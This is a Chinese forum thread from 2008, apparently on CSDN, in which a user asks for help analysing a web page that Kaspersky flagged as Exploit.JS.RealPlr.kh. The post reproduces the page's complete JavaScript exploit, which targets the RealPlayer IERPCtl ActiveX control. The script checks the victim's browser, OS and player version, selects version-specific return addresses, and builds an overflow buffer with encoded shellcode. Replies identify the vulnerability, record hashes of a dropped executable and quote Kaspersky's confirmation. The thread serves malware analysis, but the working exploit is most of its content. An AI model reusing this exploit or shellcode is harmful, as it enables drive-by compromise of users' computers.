9,513
社区成员
发帖
与我相关
我的任务
分享我的卡巴报毒 我把源代码皆下来了 哪位达人能分析下吗
检测到:木马程序 Exploit.JS.RealPlr.kh URL: http://cao.awerbiz.cn/cao/real.htm
<script>
var pao1="LLLL\\XXXXXLD";
var pao2=pao1;
var pao3="c:\\Program Files\\NetMeeti";
var pao4="ng\\..\\..\\WINDOWS\\Media\\chime";
var pao5="s.wav";
var pao6=pao3+pao4+pao5;
var pao7="c:\\Program Files\\Ne";
var pao8="tMeeting\\TestSn";
var pao9="d.wav";
var pao0=pao7+pao8+pao9;
var pps1="C:\\WINDOWS\\system32";
var pps2="\\BuzzingBee.wav";
var pps3=pps1+pps2;
var pps4="C:\\WINDOWS\\clock.avi";
var pps5="c:\\Program Files\\NetMeeting";
var pps6="\\..\\..\\WINDOWS\\Media\\tada.wav";
var pps7=pps5+pps6;
var paopaopaopaopaopaopao=pps7;
var pps8="C:\\WINDOWS\\syste";
var pps9="m32\\LoopyMusic.wav";
var pps0=pps8+pps9;
var sel1="IERPCtl.I";
var sel2="ERPCtl.1";
var sel3=sel1+sel2;
var x1="%75"+"%06"+"%74"+"%04";var x2="%7f"+"%a5"+"%60";
var x3="%4f"+"%71"+"%a4"+"%60";var x4="%63"+"%11"+"%08"+"%60";
var x5="%63"+"%11"+"%04"+"%60";var x6="%79"+"%31"+"%01"+"%60";
var x7="%79"+"%31"+"%09"+"%60";var x8="%51"+"%11"+"%70"+"%63";
var pplive=[x1,x2,x3,x4,x5,x6,x7,x8];
</script>
<script>
function RealExploit()
{
var user=navigator.userAgent["toLowerCase"]();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
creobj=sel3;
try{
Realpao=new window["ActiveXObject"](creobj)
}
catch(error){
return
}
RealVersion=Realpao.PlayerProperty("PRODUCTVERSION");
var reading="";
var tiaozhuan=unescape(pplive[0]);
var fanhui;
for(i=0;i<32*148;i++)
reading+="S";
if(RealVersion.indexOf("6.0.14.")==-1)
{
if(navigator.userLanguage.toLowerCase()=="zh-cn")
fanhui=unescape(pplive[1]);
else if(navigator.userLanguage.toLowerCase()=="en-us")
fanhui=unescape(pplive[2]);
else return
}
else if(RealVersion=="6.0.14.544")
fanhui=unescape(pplive[3]);
else if(RealVersion=="6.0.14.550")
fanhui=unescape(pplive[4]);
else if(RealVersion=="6.0.14.552")
fanhui=unescape(pplive[5]);
else if(RealVersion=="6.0.14.543")
fanhui=unescape(pplive[6]);
else if(RealVersion=="6.0.14.536")
fanhui=unescape(pplive[7]);
else return;
if(RealVersion.indexOf("6.0.10.")!=-1)
{
for(i=0;i<4;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
for(i=0;i<6;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
for(i=0;i<9;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
for(i=0;i<10;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui
}
var pplivecode="";
pplivecode=pplivecode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
pplivecode=pplivecode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJM";
pplivecode=pplivecode+"WVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfx";
pplivecode=pplivecode+"W6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKp";
pplivecode=pplivecode+"TRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMW";
pplivecode=pplivecode+"QuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJM";
pplivecode=pplivecode+"mLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSSQqrOTnQq2W2ESB2BSYpztnasPntou30aPoFNPeT8Quopwp";
realzh=reading+pao2+pplivecode;
temp=0x8000;
while(realzh["length"]<temp)
realzh+="hohoho";
var paopaopao=pao6;
var arr1=[pao6,pao0,pps3,pps4,pps7,pps0];
Realpao["import"](arr1[Math.floor(Math["random"]()*6)],realzh,"",0,0)
}
RealExploit();
</script>
...全文
请发表友善的回复…
发表回复
skyccsm 2008-06-10
- 打赏
- 举报
第一次来 抱歉 打开无法显示 就是赚软件的漏洞 嘿嘿 本人也在裸奔儿
紫郢剑侠 2008-06-10
- 打赏
- 举报
正常的软件/程序会利用软件漏洞来传播?
卡巴回复了:
主 题: RE: cao.exe-1754e55800f753f51f69f7f21183d5ab [KLAB-5294564]
发件人: "" <newvirus@kaspersky.com>
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
Please quote all when answering. Do not forget to include you registration data.
-----------------
Regards, Vyacheslav Zakorzhevsky
Virus Analyst, Kaspersky Lab.
卡巴回复了:
主 题: RE: cao.exe-1754e55800f753f51f69f7f21183d5ab [KLAB-5294564]
发件人: "" <newvirus@kaspersky.com>
Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
Please quote all when answering. Do not forget to include you registration data.
-----------------
Regards, Vyacheslav Zakorzhevsky
Virus Analyst, Kaspersky Lab.
cppscript 2008-06-09
- 打赏
- 举报
不懂帮顶
友情提示
尽早结贴
友情提示
尽早结贴
yk1234 2008-06-09
- 打赏
- 举报
使用最新版的Realplayer11或是其它播放器就可以了。这个病毒主要针对的是低版本Realplayer的有漏洞的ActiveX控件吧。
yk1234 2008-06-09
- 打赏
- 举报
RealExploit
利用Realplayer漏洞的那个吧。
利用Realplayer漏洞的那个吧。
hebos 2008-06-09
- 打赏
- 举报
卡巴斯基误报是经常有的,所以也搞不清楚是不是病毒
紫郢剑侠 2008-06-09
- 打赏
- 举报
从该网站下载cao.exe
文件说明符 : e:\temp\cao.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-6-9 13:16:10
修改时间 : 2008-6-9 13:16:12
大小 : 25728 字节 25.128 KB
MD5 : 1754e55800f753f51f69f7f21183d5ab
SHA1: CF3CA884E2176CF786676B076FD669920C6F0DD0
CRC32: 111b6e3f
卡巴在线上传扫描 09-06-2008 09:16的病毒库无反应
瑞星20.48 无反应 :-(
文件说明符 : e:\temp\cao.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-6-9 13:16:10
修改时间 : 2008-6-9 13:16:12
大小 : 25728 字节 25.128 KB
MD5 : 1754e55800f753f51f69f7f21183d5ab
SHA1: CF3CA884E2176CF786676B076FD669920C6F0DD0
CRC32: 111b6e3f
卡巴在线上传扫描 09-06-2008 09:16的病毒库无反应
瑞星20.48 无反应 :-(
Forever_Young 2008-06-09
- 打赏
- 举报
看样子这个应该不是钻系统的漏洞,像是某个播放器的,看得眼睛累,瞎猜的,呵呵。
zhousulin5 2008-06-08
- 打赏
- 举报
从function RealExploit()这句看,写代码的这人有不错的习惯。
实话实说,我看不懂这些代码的具体含义,特别是后面那些pplivecode的。
它攻击前检查的条件,好像是IE6\7。看起来似乎在win2000中用IE5可以避免被它攻击。
实话实说,我看不懂这些代码的具体含义,特别是后面那些pplivecode的。
它攻击前检查的条件,好像是IE6\7。看起来似乎在win2000中用IE5可以避免被它攻击。
